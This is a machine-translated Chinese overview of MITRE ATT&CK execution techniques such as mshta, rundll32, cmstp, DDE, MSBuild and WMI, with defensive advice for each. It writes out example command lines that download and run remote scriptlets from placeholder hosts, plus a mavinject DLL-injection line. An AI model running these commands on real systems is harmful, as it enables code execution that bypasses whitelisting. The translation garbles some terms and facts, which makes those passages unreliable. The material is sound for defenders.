链接到所有部分:第1部分。获得初始访问权限(Initial Access)第2部分。执行第3部分。紧固(持久性)第4部分。特权提升第5部分。逃避防御第6部分。获取凭据(凭据访问)第7部分。发现第8部分。横向运动第9部分。数据收集(Collection)第十部分渗透第11部分。命令和控制“执行”阶段描述了攻击者使用被攻击系统中远程和本地执行的方法和方法的情况,这些手段和方法在上一阶段已交付给被攻击的系统使用。
对于使用本文中阐述的信息可能造成的后果,作者概不负责,对于某些表述和术语可能存在的不准确性,我们深表歉意。 发布的信息是对MITER ATT&CK内容的免费重述。系统: macOS
权限:用户
描述: AppleScript语言具有使用Apple Event的能力-作为进程间通信(IPC)的一部分,应用程序之间交换的消息。 使用Apple Event,您可以与在本地或远程打开的几乎所有应用程序进行交互,从而触发事件,例如打开窗口和按下键。 使用以下命令运行脚本:
Osascript -e <script> 。
攻击者可以使用AppleScript秘密打开与远程主机的SSH连接,从而为用户提供虚假对话框。 AppleScript也可以用于更常见的攻击类型,例如Reverse Shell组织。
保护建议:必须对运行的AppleScript脚本进行强制性验证,以得到受信任的开发人员的签名。
系统: Windows
权限:用户
说明: Microsoft连接管理器配置文件安装程序(cmstp.exe)是Windows内置的“
连接管理器配置文件安装程序 ”实用程序。 Cmstp.exe可以将inf文件作为参数,因此攻击者可以准备特殊的恶意INF,以绕过AppLocker和其他锁从远程服务器下载并执行DLL或scriptlet(* .sct),因为cmstp.exe已使用Microsoft数字证书签名。
保护建议:阻止启动潜在危险的应用程序。 监视启动
C:\ Windows \ System32 \ cmstp.exe 。
系统: Windows,Linux,macOS
权限:用户,管理员,系统
描述:您可以在本地,通过远程访问软件,使用Reverse Shell等远程与命令行界面进行交互。 如果命令不包含对更改执行命令权限的进程的调用(例如,计划任务),则以命令行界面进程的当前权限级别执行命令。
安全建议:使用诸如AppLocker或软件限制策略之类的工具审核和/或锁定命令行。
系统: Windows
权限:用户,管理员,系统
描述:策略是攻击者使用Windows控制面板元素来执行任意命令作为有效负载(例如
Reaver病毒)。 恶意对象可以伪装成标准控件,并使用网络钓鱼附件传递给系统。 用于查看和配置Windows设置的实用程序是Windows控制面板元素的已注册exe文件和CPL文件。 CPL文件实际上是重命名的DLL,可以通过以下方式运行:
- 直接从命令行: control.exe <file.cpl> ;
- 使用shell32.dll中的API函数: rundll32.exe shell32.dll,Control_RunDLL <file.cpl> ;
- 双击cpl文件。
存储在System32中的已注册CPL会自动显示在Windows“控制面板”中,并在注册表中存储一个唯一的标识符:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace有关其他CPL的信息,例如显示名称和cpl文件的路径,存储在该部分的
Cpls和
Extended Properties部分中:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \控制面板通过Shell启动的一些CPL在以下部分中注册:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls文件夹\ {name} \ shellex \ PropertySheetHandlers保护建议:仅在受保护的文件夹(例如
C:\ Windows \ System32 )中限制控制面板项文件的启动和存储,启用用户帐户控制(UAC)和AppLocker以防止对系统进行未经授权的更改。 当然可以使用杀毒软件。
系统: Windows
权限:用户
说明: DDE是用于共享数据和共享内存以进行消息传递的应用程序交互的协议。 例如,Word文档可能包含一个从Excel文档自动更新的表。 该技术在于利用MS Office应用程序中与MS Office中使用DDE协议有关的漏洞。 攻击者可以在MS Office文档中嵌入对象,这些对象包含在打开文档时将执行的命令。 例如,Word文档可能包含一个Field对象,该对象的值指示命令
{DDEAUTO <命令,例如c:\ windows \ system32 \ cmd.exe>} ,该命令将在打开文档时执行。 尽管失去了相关性,仍可以使用以下项启用DDE,包括在Windows 10和MS Office 2016中:
注册表项中的
AllowDDE(DWORD) = 2:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <Office版本> \ Word \ Security 。
保护 建议 :请遵循
Microsoft的建议并安装适当的
MS Office更新 。 在Windows 10中,您还可以启用
减少攻击面(ASR)参数,以保护自己免受MS Office应用程序的DDE攻击和子进程的攻击。
系统: Windows
权限:用户,管理员,系统
说明:攻击者可以使用API执行二进制文件。 API函数(例如CreateProcess)允许程序和脚本通过指定必要的路径和参数来启动进程。 可用于执行二进制文件的API函数:
- CreateProcessA(),CreateProcessW();
- CreateProcessAsUserA(),CreateProcessAsUserW();
- CreateProcessInternalA(),CreateProcessInternalW();
- CreateProcessWithLogonW(),CreateProcessWithTokenW();
- LoadLibraryA(),LoadLibraryW();
- LoadLibraryExA(),LoadLibraryExW();
- LoadModule();
- LoadPackagedLibrary();
- WinExec();
- ShellExecuteA(),ShellExecuteW();
- ShellExecuteExA(),ShellExecuteExW()。
保护建议: API函数调用是常见事件,很难与恶意活动区分开。 保护媒介应旨在防止在攻击链开始时启动攻击者的工具,检测恶意行为并阻止潜在危险的软件。
系统: Windows
权限:用户
说明:可以使用Windows模块加载器NTDLL.dll来组织代码执行,该模块可以在任意本地或网络路径上加载DLL库。 NTDLL.dll是Windows API的一部分,可以调用诸如
CreateProcess()和
LoadLibrary()之类的函数。
保护建议: API函数调用是常规操作系统功能,很难与恶意活动区分开。 保护媒介必须针对防止在攻击链开始时启动攻击者的工具。 考虑将DLL的加载限制为
%SystemRoot%和
%ProgramFiles%目录是有意义的。
系统: Windows,Linux,macOS
权限:用户
描述:该技术涉及使用用户软件中的漏洞进行远程代码执行。 软件中漏洞的存在通常与软件开发人员违反安全编程要求有关,最终导致导致意外软件行为的可能性。
考虑一些类型的漏洞利用:
- 浏览器漏洞。 攻击者使用影子加载和网络钓鱼链接时,Web浏览器是目标。 在用户执行某些操作(例如,按照网络钓鱼电子邮件中指定的链接)之后,可以通过普通浏览器破坏受攻击的系统。
- Office应用程序漏洞利用。 恶意文件以附件或下载链接的形式传输。 要利用此漏洞,用户必须打开文档或文件以启动该漏洞。
- 第三方应用程序漏洞利用。 网络犯罪分子通常针对公司环境中常用的常见应用程序,例如Adobe Reader和Flash。 根据软件和漏洞的性质,在浏览器中或用户打开文件时会利用这些漏洞,例如,可以在MS Office文档中提供Flash对象。
保护建议:及时为使用过的应用程序安装更新。 使用各种隔离潜在漏洞应用程序的方法-沙箱,微分段和虚拟化工具,例如Windows的
Sandboxie和Apparmor,Linux的Docker。 还建议使用诸如Windows 10的
Windows Defender Exploit Guard(WDEG)或Windows早期版本的
增强缓解经验工具包(EMET)之类的漏洞利用保护系统。
系统: Windows,Linux,macOS
权限:用户,管理员,系统
说明:在交互式或远程会话中(例如,通过RDP协议)通过图形用户界面(GUI)与文件进行交互时,将启动可执行文件或脚本。
安全提示
:保护可用于远程连接到系统的凭据。 确定不必要的系统实用程序,这些第三方实用程序可用于进入交互式远程模式。
系统: Windows
权限:用户
说明: InstallUtil是Windows命令行实用程序,可以安装和卸载符合.NET Framework规范的应用程序。 Installutil将随VisualStudio自动安装。 InstallUtil.exe文件由Microsoft证书签名,并存储在以下位置:
C:\ Windows \ Microsoft.NET \ Framework \ v [版本] \ InstallUtil.exe攻击者可以使用InstallUtil功能代理代码执行并绕过应用程序白名单。
保护建议:您的系统上可能未使用InstallUtil,因此请考虑阻止InstallUtil.exe的安装。
系统: Windows
权限:系统管理员
说明:本地安全机构(LSA)是提供用户身份验证的Windows子系统。 LSA包含几个在LSASS.exe进程中运行的动态互连DLL。 攻击者可以通过替换或添加非法LSA驱动程序然后执行任意代码来攻击LSASS.exe。 该技术在Pasam和Wingbird恶意软件中实现,该恶意软件“抛出”用于加载LSASS的经过修改的DLL。 在这种情况下,在非法DLL导致崩溃和随后的LSASS服务崩溃之前,将执行恶意代码。
保护建议:在Windows 8.1和Windows Server 2012 R2中,通过设置注册表项来启用LSA保护:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL到
dword值
:00000001此保护可确保Microsoft进行LSA加载的插件和驱动程序的数字签名。 在Windows 10和Server 2016中,启用
Windows Defender凭据保护以在隔离的虚拟环境中运行lsass.exe。 打开安全的DLL搜索模式,以减少将恶意库加载到lsass.exe中的风险:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode 。
系统: macOS
权限:用户,管理员
说明: Launchctl-用于管理已启动服务的实用程序。 使用Launchctl,您可以管理系统和用户服务(LaunchDeamons和LaunchAgents)以及执行命令和程序。 Launchctl支持交互式或从标准输入重定向的命令行子命令:
launchctl Submit -l [labelname]-/到/ something /到/执行的路径``arg“''arg”''arg“通过启动和重新启动服务和守护程序,如果launchctl是经过授权的进程,攻击者可以执行代码,甚至绕过白名单,但是,加载,卸载和重新启动服务和守护程序可能需要提升的特权。
安全建议:限制用户权限,以使用组策略创建启动代理和启动启动重传。 使用
KnockKnock应用程序,
您可以发现使用launchctl来管理Launch Agent和Launch Deamons的程序。
系统: Linux,macOS
权限:用户,管理员,root
描述:攻击者可以在被引导系统中创建任务,以便在系统启动时或根据计划进行未经授权的程序启动。 Linux和Apple系统支持几种计划定期后台任务启动的方法:cron at at launchd。 与Windows Task Scheduler不同,除了使用SSH之类的远程会话外,Linux系统上的任务调度无法远程完成。
保护建议:限制用户创建计划任务的权限,阻止系统实用程序和其他可用于计划任务的软件。
系统: Windows
权限:用户
说明: Mshta.exe(位于
C:\ Windows \ System32 \中 )是运行Microsoft HTML应用程序(* .HTA)的实用程序。 HTA应用程序使用InternetExplorer使用的相同技术运行,但在浏览器之外。 由于Mshta绕过浏览器安全设置来处理文件,因此攻击者可以使用mshta.exe代理恶意HTA文件,Javascript或VBScript的执行。 可以通过内置脚本启动恶意文件:
mshta vbscript:关闭(执行(“ GetObject(”“ script:https [:] // Web服务器/有效负载[。] sct”“)”))))或直接在URL上:
mshta http [:] //网络服务器/有效负载[。] hta保护建议: mshta.exe
的功能与已达到生命周期尽头的IE的较早版本相关联。 如果您没有使用Mshta.exe,请阻止它。
系统: Windows
权限:用户,管理员
说明: PowerShell(PS)是Windows附带的功能强大的交互式命令行界面和脚本环境。 攻击者可以使用PS来收集信息并执行代码。 例如,Start-Process cmdlet可以运行可执行文件; Invoke-Command cmdlet将在本地或远程计算机上执行命令。 PS还可以用于从Internet下载并运行可执行文件,而无需将其保存到硬盘中。 对于使用PS的远程连接,您需要管理员权限。 有多种攻击PS的工具:
保护建议:可以从系统中删除PS。 如果需要PS,则应该限制管理员仅通过运行签名脚本来运行它。 禁用WinRM服务以防止PS脚本的远程执行。 应该注意的是,有一些
方法可以绕过PS脚本执行策略 。
系统: Windows
权限:用户,管理员
说明: Regsvcs和Regasm是Windows实用工具,用于向.NET组件对象模型(COM)组装系统进行注册。 这两个文件均由Microsoft进行数字签名。 当属性是在注册或注销之前必须运行的代码:[ComRegisterFunction]或[ComUnregisterFunction]时,攻击者可以使用Regsvcs和Regasm代理代码执行。 即使进程运行时权限不足,甚至在启动时崩溃,也可以启动具有此类属性的代码。
保护建议:如果您的系统或网络上未使用Regsvcs.exe和Regasm.exe,则将其阻止。
系统: Windows
权限:用户,管理员
说明: Regsvr32.exe是一个控制台实用程序,用于在注册表中注册和注销OLE控件(例如ActiveX和DLL)。 Regsvr32.exe由Microsoft数字签名,可用于代理代码执行。 例如,使用Regsvr32,您可以下载一个XML文件,其中包含将绕过白名单的Java代码(小脚本)。
保护建议: EMET中的减少攻击面(ASR)和Windows Defender中的Advanced Theart Protection可以阻止使用Regsvr32.exe绕过白名单。
系统: Windows
权限:用户
说明: Rundll32.exe是一个系统实用程序,用于启动位于动态连接的库中的程序,可以调用这些程序来代理二进制文件,并通过未公开的shel32.dll函数
Control_RunDLL和
Control_RunDLLAsUser执行Windows控制文件(.cpl)。 双击.cpl文件还会使Rundll32.exe执行。 Rundll32也可以用于执行脚本,例如JavaScript:
rundll32.exe javascript:“ \ .. \ mshtml,RunHTMLApplication”; document.write(); GetObject(“ scrirpt:https [:] // www [。]示例[。] com /恶意.sct”)“诸如Poweliks之类的防病毒软件会检测到以上使用rundll32.exe的方法。
保护建议:EMET中的减少攻击面(ASR)和Windows Defender中的Advanced Theart Protection可以阻止使用Rundll32.exe绕过白名单。
系统: Windows
权限:用户,管理员,系统
说明:诸如at,schtasks和Windows Task Scheduler之类的实用程序可用于计划程序和脚本以在特定的日期和时间运行。如果使用RPC进行身份验证并启用打印机和文件共享,则可以在远程系统上安排任务。另外,需要管理员权限才能安排远程系统上的任务。攻击者可以使用远程任务调度在系统启动时或在特定帐户的上下文中执行程序。保护建议:在注册表中打开代表系统的用户创建任务的权限限制:HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0注意:SubmitControl = 1,允许“服务器操作员”组的成员创建作业。另外,配置适当的GPO:计算机配置> [策略]> Windows设置>安全设置>本地策略>安全选项:域控制器:允许服务器操作员安排任务:禁用计算机配置> [策略]> Windows设置>安全设置>本地策略>用户权限分配:提高计划优先级考虑使用PowerSploit框架,该框架包含PowerUP模块,用于在活动中查找计划任务的解决方案中的漏洞。系统: Windows,Linux,macOS权限:用户说明:攻击者可以使用脚本来自动化其动作,加快操作任务并因此减少访问所需的时间。通过直接在API级别与OS交互而不是调用其他程序,可以使用某些脚本语言来绕过监视过程的机制。脚本可以作为宏嵌入在Office文档中,然后用于网络钓鱼攻击。在这种情况下,攻击者希望用户运行宏文件,或者用户同意激活宏。有几种实现脚本的流行框架-Metasploit,Veil,PowerSploit。安全提示:限制对VBScript或PowerShell等脚本的访问。在Windows上,通过启用GPO的安全查看和宏禁止功能来配置MS Office安全设置。如果需要宏,则仅允许运行可信的数字签名宏。使用微分段和应用程序虚拟化,例如,Windows的Sandboxie和Apparmor,Linux的Docker。系统: Windows权限:管理员,系统说明:攻击者可以使用与Windows服务进行交互的特殊方法来执行二进制代码,命令或脚本,例如,使用服务控制管理器(SCM),您可以创建新服务并修改正在运行的服务。保护建议:确保系统上的当前特权设置禁止从低特权用户启动具有高特权的服务。确保具有较低权限的用户不能替换或修改对系统具有较高权限的可执行文件。考虑使用工具来限制使用AppLocker启动潜在危险程序并配置软件限制策略。系统: Windows权限:用户描述:使用受信任的数字证书签名的二进制文件可以在受数字签名验证保护的Windows系统上运行。 Windows安装过程中默认情况下会签名的几个Microsoft文件可用于代理其他文件的启动:Mavinject.exe是Windows实用程序,允许执行代码。 Mavinject可用于将DLL输入到正在运行的进程中:“ C:\ Program Files \ Common Files \ microsoft shared \ ClickToRun \ MavInject32.exe” [PID] / INJECTRUNNING [PATH DLL]C:\ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [PATH DLL]SyncAppvPublishingServer.exe-可用于运行powershell脚本,而无需运行powershell.exe。还有更多类似的二进制文件。保护建议:您系统上可能未使用许多签名文件,因此请考虑阻止其启动。系统: Windows权限:用户说明:使用受信任证书签名的脚本可用于代理恶意文件,例如,PubPrn.vbs已使用Microsoft证书签名,并可用于从远程服务器运行文件:cscript C:\ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs 127.0.0.1脚本:http [:] // 192.168.1.100/hi.png保护建议:您的系统上可能不需要这种签名的脚本,因此请考虑阻止其启动。系统: Linux和macOS权限:用户描述:源-一个命令,可让您从当前命令外壳中的指定文件中读取和执行所有命令,这意味着所有指定的环境变量将在将要启动的所有脚本和命令中可见。 Source可以通过两种方式启动:source / path /到/ filename [arguments]或。 /路径/到/文件名[参数]注意句点后的空格。如果没有空格,该程序将在新的命令外壳中启动。攻击者可以使用Source将未标记“ x”的文件执行为可执行文件。保护建议: 由于合法性,要防止在系统中使用内置命令非常困难,因此,保护媒介必须针对在攻击的早期阶段(例如在系统中传递或创建恶意文件的阶段)防止恶意行为。系统: Linux,macOS权限:用户说明:攻击者可以通过更改其扩展名来隐藏文件的真实类型。对于某些类型的文件(不适用于.app文件),在文件名的末尾添加空格将更改操作系统处理文件的方式。例如,如果有一个名为Evil.bin的可执行文件Mach-O,则当用户双击时,操作系统将启动Terminal.app并执行它。如果将同一文件重命名为evil.txt,则双击该文件将在文本编辑器中启动。但是,如果将文件重命名为“ evil.txt”(末尾有空格),则通过双击真实文件的类型,将确定操作系统并启动二进制文件。攻击者可以使用此技术诱使用户启动恶意可执行文件。保护建议:难以防止使用此技术,因为 攻击者使用操作系统的标准操作机制,因此,保护媒介必须针对在攻击的早期阶段(例如,在系统中交付或创建恶意文件的阶段)防止恶意行为。系统: Windows,Linux,macOS权限:用户,管理员,系统说明:攻击媒介定向到受攻击网络中用于管理目的的第三方软件和软件部署系统(SCCM,VNC,HBSS,Altris等)。如果攻击者可以访问此类系统,则攻击者可以在与软件部署系统连接的所有主机上远程运行代码。实施此技术所需的权限取决于特定的系统配置。本地凭据可能足以访问软件部署服务器;但是,可能需要管理员帐户才能启动软件部署。保护建议:检查软件部署系统的安全级别。确保对软件管理系统的访问受到限制,控制和保护。严格使用强制性预批准策略进行远程软件部署。向数量有限的管理员提供对软件部署系统的访问权限,确保隔离软件部署系统。确保用于访问软件部署系统的凭据是唯一的,并且未在公司网络上的其他服务中使用。如果将软件部署系统配置为仅运行经过签名的二进制文件,则请验证受信任证书没有存储在软件部署系统本身中,而是位于无法远程访问的系统上。系统: Linux,macOS权限:用户,管理员说明: trap命令用于保护脚本免受干扰(Ctrl + C,Ctrl + D,Ctrl + Z等)。如果脚本接收到trap命令的参数中指定的中断信号,则脚本将自行处理该中断信号,而Shell将不会处理该信号。攻击者可以使用陷阱来注册将在Shell收到某些中断信号时执行的代码。保护建议:由于攻击者使用操作系统的标准机制,因此很难防止使用此技术。该保护媒介应旨在防止在攻击的早期阶段(例如,在系统中传递或创建恶意文件的阶段)执行恶意操作。系统: Windows权限:用户说明:软件开发人员使用许多实用程序,这些实用程序可用于在软件开发,调试和反向工程期间以各种形式执行代码。这些实用程序通常使用数字证书进行签名,从而使它们能够绕过安全机制和应用程序白皮书来代理操作系统中的恶意代码。杂种是Visual Studio中使用的软件开发平台。它使用XML文件形式的项目,这些项目描述了构建各种平台和配置的要求。 .NET版本4的MSBuild允许您将C#代码插入XML项目中,进行编译,然后执行。 MSBulid.exe由Microsoft数字证书签名。该DNX -净执行Environmant(dnx.exe)是Visual Studio企业的一部分,集软件开发(开发工具包)的。自2016年.NET Core CLI以来停产。 DNX在标准Windows版本中缺失,只能在使用.Net Core和ASP.NET Core 1.0时出现在开发人员主机上。 Dnx.exe经过数字签名,可用于代理代码执行。RCSI-C#的非交互式命令行界面,类似于csi.exe。它是在Roslyn .Net编译器平台的早期版本中引入的。 Rcsi.exe由Microsoft数字证书签名。可以在Windows命令提示符下使用Rcsi.exe编写和执行C#.csx脚本文件。WinDbg / CDB是MS Windows内核,是用于在用户模式下进行调试的实用程序。 Microsoft控制台调试器cdb.exe也是用户模式调试器。这两个实用程序都可以用作独立工具。常用于软件开发,逆向工程,在常规Windows系统上找不到。 WinDbg.exe和CDB.exe文件均由Microsoft数字证书签名,可用于代理代码。追踪器-tracker.exe文件跟踪实用程序。作为MSBuild的一部分包含在.NET中。用于在Windows 10文件系统中注册调用,攻击者可以使用tracker.exe在各种进程中执行DLL。Tracker.exe也使用Microsoft证书签名。保护建议:如果用户未将上述所有文件用于预期目的,则应将其从系统中删除。系统: Windows,Linux,macOS权限:用户说明:攻击者可以依靠用户的某些操作来执行某些操作。当用户打开带有网络钓鱼附件并带有图标和可见文档文件扩展名的恶意可执行文件时,这可以是直接执行代码。有时,可以使用其他技术,例如,当用户单击网络钓鱼电子邮件中的链接时,这会导致利用浏览器漏洞。 “用户执行”技术通常用于入侵的其他阶段,例如,当攻击者将文件放在共享目录中或用户的桌面上时,希望他“单击”该文件。保护提示:提高用户意识。禁止下载.scr,.exe,.pif,.cpl等文件。使用防病毒软件并执行IPS系统。系统: Windows权限:用户,管理员说明: WMI是用于管理Windows的工具,它提供对Windows系统组件的本地和远程访问。 WMI使用SMB和RPCS(在端口135上运行)。攻击者可以使用WMI与本地和远程系统进行交互,也可以作为执行许多战术操作的一种手段,例如在资源审查(发现)阶段收集信息以及在“文字运动”期间进行远程文件执行。保护建议:禁用WMI和RPCS可能导致系统不稳定。默认情况下,只有管理员可以通过WMI远程连接到系统。防止在管理帐户和其他特权帐户之间重复特权。系统: Windows权限:用户,管理员说明: Windows远程管理(WinRM)是服务和协议的名称,它允许远程用户与系统进行交互(例如,启动文件,更改注册表,更改服务。要启动,请使用winrm命令和其他程序,如PowerShell中的保护建议:禁用WinRM服务,如果有必要,有独立的账户和权限绝缘。基础设施WinRM的应该是.. WinRM的建议上设置身份验证方法和使用 randmauerov主机只允许某些设备访问WinRM的。